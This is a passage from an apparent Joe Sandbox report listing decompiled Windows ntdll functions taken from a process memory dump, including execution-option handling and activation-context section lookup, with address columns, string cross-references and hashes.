						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E1D7D4C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E1D81EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E1D7DA9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E1D81EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E1D7DA690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E1D81EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E1D80CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E1D81EF10();
						goto L15;
					}
					L8:
					_t56 = E1D7C7648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                    0x1d7c7560
                                                    0x1d7c7562
                                                    0x1d7c756f
                                                    0x1d7c7571
                                                    0x1d7c75ab
                                                    0x1d7c75b9
                                                    0x1d7c75b9
                                                    0x1d7c7579
                                                    0x1d7c7583
                                                    0x1d7c758f
                                                    0x1d804443
                                                    0x1d7c7595
                                                    0x1d7c759e
                                                    0x1d7c759e
                                                    0x1d7c75a2
                                                    0x1d7c75bc
                                                    0x1d7c75c2
                                                    0x1d7c75c7
                                                    0x1d7c75c9
                                                    0x1d7c7621
                                                    0x1d7c7623
                                                    0x1d7c7624
                                                    0x1d7c75f8
                                                    0x1d7c75ff
                                                    0x1d7c7601
                                                    0x1d7c762c
                                                    0x1d7c7603
                                                    0x1d7c7609
                                                    0x1d7c7610
                                                    0x1d7c7612
                                                    0x1d7c7612
                                                    0x1d7c7612
                                                    0x1d7c7614
                                                    0x1d7c7616
                                                    0x1d7c7630
                                                    0x1d7c7633
                                                    0x1d7c7633
                                                    0x1d7c7618
                                                    0x1d7c761a
                                                    0x1d8045c9
                                                    0x1d8045c9
                                                    0x1d8045d1
                                                    0x1d8045d2
                                                    0x1d8045d4
                                                    0x1d8045d6
                                                    0x1d8045d6
                                                    0x00000000
                                                    0x1d7c761a
                                                    0x1d7c75ce
                                                    0x1d7c75d4
                                                    0x1d7c75da
                                                    0x1d7c75df
                                                    0x1d7c75e1
                                                    0x1d80444a
                                                    0x1d804450
                                                    0x00000000
                                                    0x00000000
                                                    0x1d804456
                                                    0x1d804469
                                                    0x1d804476
                                                    0x1d804486
                                                    0x1d80448b
                                                    0x1d804497
                                                    0x1d8044b9
                                                    0x1d8044bf
                                                    0x1d8044c1
                                                    0x1d8044c3
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8044c9
                                                    0x1d8044cf
                                                    0x1d8044d1
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8044dc
                                                    0x1d8044de
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8044e6
                                                    0x1d8044ed
                                                    0x1d8044ef
                                                    0x1d8045c4
                                                    0x00000000
                                                    0x1d8045c4
                                                    0x1d8044f7
                                                    0x1d8044f8
                                                    0x1d804510
                                                    0x1d804515
                                                    0x1d804524
                                                    0x1d80452b
                                                    0x1d80452c
                                                    0x1d80452e
                                                    0x1d804556
                                                    0x1d804561
                                                    0x1d804567
                                                    0x1d804569
                                                    0x1d80456c
                                                    0x1d80456e
                                                    0x1d804574
                                                    0x1d804576
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d80457c
                                                    0x1d80457c
                                                    0x1d804584
                                                    0x1d804588
                                                    0x1d80458a
                                                    0x1d80458c
                                                    0x1d80458e
                                                    0x1d80458e
                                                    0x1d80459b
                                                    0x1d8045a0
                                                    0x1d8045a7
                                                    0x1d8045ac
                                                    0x1d8045ae
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8045b4
                                                    0x1d8045b4
                                                    0x1d8045b7
                                                    0x1d8045b7
                                                    0x00000000
                                                    0x1d8045bf
                                                    0x1d804530
                                                    0x1d804535
                                                    0x1d804537
                                                    0x1d804539
                                                    0x00000000
                                                    0x1d80453e
                                                    0x1d7c75e7
                                                    0x1d7c75e9
                                                    0x1d7c75ee
                                                    0x1d7c75f0
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7c75f2
                                                    0x00000000
                                                    0x1d7c75a4
                                                    0x1d7c75a4
                                                    0x1d7c75a4
                                                    0x00000000
                                                    0x1d7c75a4

                                                    Strings
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1D80454D
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1D804507
                                                    • Execute=1, xrefs: 1D80451E
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1D804460
                                                    • ExecuteOptions, xrefs: 1D8044AB
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 1D804592
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1D804530
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: d5fecf0cf5fd45f5469406b3fcb70f5af635f30f99ef9f9d3753c408414ecda4
                                                    • Instruction ID: cc3dbad378db6b792139666ad4c90f35d8701c5837835cfcba0906be4df409fc
                                                    • Opcode Fuzzy Hash: d5fecf0cf5fd45f5469406b3fcb70f5af635f30f99ef9f9d3753c408414ecda4
                                                    • Instruction Fuzzy Hash: 1B510E3560421AAEDF119BA8FC8AFFDB369FF04724F0105E9DA05A7191DB30AA45CB53
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7AA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E1D7AA170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E1D7AA600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E1D7AA760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x1d8891e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E1D794428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E1D7AA600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E1D81EF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E1D81EF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}


























































                                                    0x1d7aa178
                                                    0x1d7aa17f
                                                    0x1d7aa182
                                                    0x1d7aa18f
                                                    0x1d7aa4b4
                                                    0x00000000
                                                    0x1d7f77ce
                                                    0x1d7f77ce
                                                    0x00000000
                                                    0x1d7f77ce
                                                    0x1d7aa195
                                                    0x1d7aa195
                                                    0x1d7aa199
                                                    0x1d7aa1a1
                                                    0x1d7aa1a9
                                                    0x1d7aa1b1
                                                    0x1d7f77f3
                                                    0x1d7f77f3
                                                    0x00000000
                                                    0x1d7aa1b7
                                                    0x1d7aa1b7
                                                    0x1d7aa1c0
                                                    0x00000000
                                                    0x1d7aa1c6
                                                    0x1d7aa1c6
                                                    0x1d7aa1cc
                                                    0x1d7aa5dc
                                                    0x00000000
                                                    0x1d7aa5e2
                                                    0x00000000
                                                    0x1d7aa5e2
                                                    0x1d7aa1d2
                                                    0x1d7aa1d4
                                                    0x00000000
                                                    0x1d7aa1da
                                                    0x1d7aa1da
                                                    0x1d7aa1dd
                                                    0x00000000
                                                    0x1d7aa1e3
                                                    0x1d7aa1e3
                                                    0x1d7aa1e6
                                                    0x1d7aa1fa
                                                    0x1d7aa1fd
                                                    0x1d7aa5f0
                                                    0x00000000
                                                    0x1d7aa5f6
                                                    0x1d7f77fd
                                                    0x1d7f7802
                                                    0x1d7f7807
                                                    0x00000000
                                                    0x1d7f7807
                                                    0x1d7aa203
                                                    0x1d7aa203
                                                    0x1d7aa208
                                                    0x1d7aa20b
                                                    0x1d7aa20f
                                                    0x1d7aa216
                                                    0x1d7aa21c
                                                    0x1d7aa224
                                                    0x1d7aa228
                                                    0x1d7aa22b
                                                    0x1d7aa233
                                                    0x1d7aa23b
                                                    0x1d7aa23f
                                                    0x1d7aa243
                                                    0x1d7aa247
                                                    0x1d7aa250
                                                    0x1d7aa252
                                                    0x1d7aa255
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7aa25b
                                                    0x1d7aa263
                                                    0x1d7aa26f
                                                    0x1d7aa26f
                                                    0x1d7aa277
                                                    0x1d7aa27d
                                                    0x1d7aa3ae
                                                    0x1d7aa3ae
                                                    0x1d7aa3b4
                                                    0x1d7aa3be
                                                    0x1d7f7823
                                                    0x1d7f7826
                                                    0x00000000
                                                    0x1d7f782c
                                                    0x1d7f782c
                                                    0x00000000
                                                    0x1d7f782c
                                                    0x1d7aa3c4
                                                    0x1d7aa3c4
                                                    0x1d7aa3c9
                                                    0x00000000
                                                    0x1d7aa3c9
                                                    0x1d7aa283
                                                    0x1d7aa283
                                                    0x1d7aa288
                                                    0x00000000
                                                    0x1d7aa288
                                                    0x1d7aa265
                                                    0x1d7aa265
                                                    0x1d7aa269
                                                    0x1d7aa4bf
                                                    0x1d7aa4c2
                                                    0x1d7aa4c8
                                                    0x1d7aa4e3
                                                    0x1d7f780e
                                                    0x00000000
                                                    0x1d7aa4e9
                                                    0x1d7aa4ec
                                                    0x1d7f7819
                                                    0x00000000
                                                    0x1d7aa4f2
                                                    0x1d7aa4f2
                                                    0x00000000
                                                    0x1d7aa4f2
                                                    0x1d7aa4ec
                                                    0x1d7aa4ca
                                                    0x1d7aa4ca
                                                    0x1d7aa4cc
                                                    0x00000000
                                                    0x1d7aa4d2
                                                    0x1d7aa4d2
                                                    0x1d7aa4d2
                                                    0x1d7aa4d7
                                                    0x1d7aa28c
                                                    0x1d7aa28e
                                                    0x1d7f7833
                                                    0x1d7f7838
                                                    0x1d7f7838
                                                    0x00000000
                                                    0x1d7aa294
                                                    0x1d7aa2a5
                                                    0x1d7aa2ac
                                                    0x1d7aa3d2
                                                    0x1d7aa3d9
                                                    0x00000000
                                                    0x1d7aa3e8
                                                    0x1d7aa3e8
                                                    0x1d7aa3ec
                                                    0x1d7aa3f0
                                                    0x00000000
                                                    0x1d7aa3f0
                                                    0x1d7aa2b2
                                                    0x1d7aa2b2
                                                    0x1d7aa2d2
                                                    0x1d7aa2d6
                                                    0x1d7aa2d8
                                                    0x1d7aa2da
                                                    0x1d7aa2dc
                                                    0x1d7aa2de
                                                    0x1d7f783a
                                                    0x1d7f783c
                                                    0x00000000
                                                    0x1d7f7842
                                                    0x00000000
                                                    0x1d7f7842
                                                    0x1d7aa2e4
                                                    0x1d7aa2e4
                                                    0x1d7aa2e4
                                                    0x1d7aa2eb
                                                    0x1d7f78ed
                                                    0x1d7f78ed
                                                    0x00000000
                                                    0x1d7aa2f1
                                                    0x1d7aa2f1
                                                    0x1d7aa300
                                                    0x1d7aa300
                                                    0x1d7aa300
                                                    0x1d7aa30a
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7aa310
                                                    0x1d7aa325
                                                    0x1d7aa32c
                                                    0x1d7aa4f7
                                                    0x1d7aa500
                                                    0x1d7aa502
                                                    0x1d7aa505
                                                    0x1d7aa50b
                                                    0x1d7aa5a5
                                                    0x1d7aa5b8
                                                    0x1d7aa5be
                                                    0x1d7aa5c2
                                                    0x1d7aa5cb
                                                    0x1d7aa5d1
                                                    0x1d7aa5d1
                                                    0x1d7aa5cb
                                                    0x1d7aa50b
                                                    0x1d7aa523
                                                    0x1d7aa549
                                                    0x1d7aa551
                                                    0x1d7aa525
                                                    0x1d7aa53c
                                                    0x1d7aa543
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7aa543
                                                    0x1d7aa332
                                                    0x1d7aa337
                                                    0x1d7aa393
                                                    0x1d7aa399
                                                    0x1d7aa339
                                                    0x1d7aa339
                                                    0x1d7aa342
                                                    0x1d7aa344
                                                    0x1d7aa34a
                                                    0x1d7aa34e
                                                    0x1d7aa355
                                                    0x1d7aa359
                                                    0x00000000
                                                    0x1d7aa360
                                                    0x1d7aa363
                                                    0x1d7aa3fa
                                                    0x1d7aa3fc
                                                    0x1d7f7847
                                                    0x1d7f784f
                                                    0x00000000
                                                    0x1d7f7855
                                                    0x1d7f7855
                                                    0x1d7f7859
                                                    0x00000000
                                                    0x1d7f785f
                                                    0x1d7f785f
                                                    0x1d7f7862
                                                    0x1d7f7868
                                                    0x1d7f7892
                                                    0x1d7f7894
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f786a
                                                    0x1d7f786d
                                                    0x1d7f787e
                                                    0x1d7f788b
                                                    0x00000000
                                                    0x1d7f7880
                                                    0x1d7f7880
                                                    0x1d7f7885
                                                    0x1d7f789a
                                                    0x1d7f789a
                                                    0x1d7f789f
                                                    0x00000000
                                                    0x1d7f789f
                                                    0x1d7f786f
                                                    0x1d7f7873
                                                    0x1d7f788e
                                                    0x1d7f788e
                                                    0x00000000
                                                    0x1d7f788e
                                                    0x1d7f786d
                                                    0x1d7f7868
                                                    0x1d7f7859
                                                    0x1d7aa402
                                                    0x1d7aa402
                                                    0x1d7aa405
                                                    0x1d7aa554
                                                    0x1d7aa556
                                                    0x1d7aa55e
                                                    0x1d7aa564
                                                    0x1d7aa56a
                                                    0x00000000
                                                    0x1d7aa570
                                                    0x1d7aa570
                                                    0x1d7aa575
                                                    0x00000000
                                                    0x1d7aa575
                                                    0x1d7aa40b
                                                    0x1d7aa40e
                                                    0x00000000
                                                    0x1d7aa414
                                                    0x1d7aa414
                                                    0x1d7aa418
                                                    0x1d7aa420
                                                    0x1d7aa426
                                                    0x1d7aa42c
                                                    0x00000000
                                                    0x1d7aa432
                                                    0x1d7aa432
                                                    0x1d7aa437
                                                    0x00000000
                                                    0x1d7aa437
                                                    0x1d7aa42c
                                                    0x1d7aa40e
                                                    0x1d7aa405
                                                    0x1d7aa369
                                                    0x1d7aa369
                                                    0x1d7aa36c
                                                    0x1d7f78e3
                                                    0x00000000
                                                    0x1d7aa372
                                                    0x1d7aa372
                                                    0x1d7aa374
                                                    0x1d7aa452
                                                    0x1d7aa459
                                                    0x1d7aa57e
                                                    0x1d7aa585
                                                    0x00000000
                                                    0x1d7aa594
                                                    0x1d7aa594
                                                    0x1d7aa598
                                                    0x00000000
                                                    0x1d7aa598
                                                    0x1d7aa45f
                                                    0x1d7aa45f
                                                    0x1d7aa47f
                                                    0x1d7aa483
                                                    0x1d7aa485
                                                    0x1d7aa487
                                                    0x1d7aa489
                                                    0x1d7aa48b
                                                    0x00000000
                                                    0x1d7aa491
                                                    0x1d7aa493
                                                    0x1d7f78a8
                                                    0x1d7f78b1
                                                    0x1d7f78c3
                                                    0x1d7f78c3
                                                    0x1d7f78cb
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f78d6
                                                    0x1d7f78dc
                                                    0x00000000
                                                    0x1d7f78de
                                                    0x00000000
                                                    0x1d7f78de
                                                    0x00000000
                                                    0x1d7f78dc
                                                    0x1d7f78c3
                                                    0x1d7f78b1
                                                    0x1d7aa499
                                                    0x1d7aa499
                                                    0x00000000
                                                    0x1d7aa499
                                                    0x1d7aa48b
                                                    0x1d7aa37a
                                                    0x1d7aa37a
                                                    0x1d7aa37f
                                                    0x1d7aa381
                                                    0x1d7aa49b
                                                    0x1d7aa49b
                                                    0x1d7aa4a2
                                                    0x00000000
                                                    0x1d7aa4a8
                                                    0x00000000
                                                    0x1d7aa4a8
                                                    0x1d7aa387
                                                    0x1d7aa387
                                                    0x1d7aa38c
                                                    0x1d7aa38e
                                                    0x1d7aa38e
                                                    0x00000000
                                                    0x1d7aa38c
                                                    0x1d7aa381
                                                    0x1d7aa374
                                                    0x1d7aa36c
                                                    0x00000000
                                                    0x1d7aa363
                                                    0x1d7aa360
                                                    0x1d7aa337
                                                    0x00000000
                                                    0x1d7aa32c
                                                    0x1d7f78f1
                                                    0x1d7f78f1
                                                    0x1d7f78fc
                                                    0x1d7f7904
                                                    0x00000000
                                                    0x1d7f7904
                                                    0x1d7aa2eb
                                                    0x1d7aa2de
                                                    0x1d7aa2ac
                                                    0x1d7aa28e
                                                    0x1d7aa4cc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7aa269
                                                    0x00000000
                                                    0x1d7aa39c
                                                    0x1d7aa39c
                                                    0x1d7aa39f
                                                    0x00000000
                                                    0x1d7aa3a5
                                                    0x1d7aa3a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7aa3a8
                                                    0x00000000
                                                    0x1d7aa39f
                                                    0x1d7aa250
                                                    0x1d7aa1e8
                                                    0x1d7aa1f1
                                                    0x1d7f77d8
                                                    0x1d7f77dd
                                                    0x1d7f77e2
                                                    0x1d7f77e7
                                                    0x1d7f77e7
                                                    0x1d7f77e9
                                                    0x1d7f77eb
                                                    0x00000000
                                                    0x1d7aa1f7
                                                    0x1d7aa1f7
                                                    0x00000000
                                                    0x1d7aa1f7
                                                    0x1d7aa1f1
                                                    0x1d7aa1e6
                                                    0x1d7aa1dd
                                                    0x1d7aa1d4
                                                    0x1d7aa1cc
                                                    0x1d7aa1c0
                                                    0x1d7aa1b1
                                                    0x00000000

                                                    Strings
                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D7F7807
                                                    • Actx , xrefs: 1D7F7819, 1D7F7880
